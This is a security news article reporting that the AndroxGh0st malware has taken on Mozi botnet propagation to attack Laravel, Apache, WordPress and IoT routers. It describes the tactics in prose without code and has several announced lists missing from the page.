In a concerning evolution of botnet capabilities, cybersecurity researchers have uncovered that the AndroxGh0st malware is now leveraging the Mozi botnet to expand its reach and propagation power. This collaboration aims to exploit a broader range of vulnerabilities, focusing on internet-facing and IoT applications to build a robust network of compromised devices for malicious purposes.
The AndroxGh0st Malware Campaign
AndroxGh0st, a Python-based cloud attack tool, initially gained attention for its focus on targeting Laravel applications to extract sensitive cloud service data, including AWS, SendGrid, and Twilio credentials. Active since 2022, AndroxGh0st has used known vulnerabilities in applications like the Apache web server (CVE-2021-41773) and the Laravel Framework (CVE-2018-15133) to gain unauthorized access, escalate privileges, and maintain persistence.
In January 2024, U.S. intelligence agencies reported that AndroxGh0st had been used to create botnets for targeted exploitation of victim networks. Now, according to CloudSEK's latest findings, the malware has expanded to exploit an array of vulnerabilities to bolster its botnet:
Exploited Vulnerabilities:
The AndroxGh0st botnet employs common administrative usernames combined with a consistent password pattern to brute-force access to WordPress /wp-admin panels, allowing it to compromise backend website controls.
Mozi Botnet: Expanding the Attack Vector
The Mozi botnet, primarily known for its attacks on IoT devices, has long been a persistent force in the DDoS landscape. Even after the arrest of its original authors by Chinese authorities in 2021, Mozi remained active until a kill-switch command in August 2023 brought a temporary halt. Despite this setback, Mozi's propagation mechanisms are now integrated within AndroxGh0st, enabling it to spread further through IoT device networks.
AndroxGh0st uses Mozi’s capabilities to propagate malware through devices such as Netgear DGN routers and Dasan GPON home routers, leveraging unauthenticated command execution vulnerabilities to distribute a malicious payload called “Mozi.m” from remote servers.
Implications of the AndroxGh0st-Mozi Integration
By embedding Mozi’s propagation functionalities, AndroxGh0st gains expanded reach across IoT environments, which often lack comprehensive security measures. CloudSEK’s report highlights the strategic advantage of this collaboration:
Takeaways for Security Teams and IoT Users
The convergence of these two botnets underscores the importance of robust security practices across cloud applications, IoT devices, and other internet-facing infrastructures. To mitigate the risk of compromise by sophisticated botnets like AndroxGh0st and Mozi, organizations should consider the following best practices:
The AndroxGh0st and Mozi alliance demonstrates a concerning escalation in botnet capabilities, combining credential-stealing, DDoS, and IoT infection tactics. As cybercriminals increasingly collaborate across malware variants, organizations must remain vigilant in safeguarding their networks and internet-connected devices against these evolving threats.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067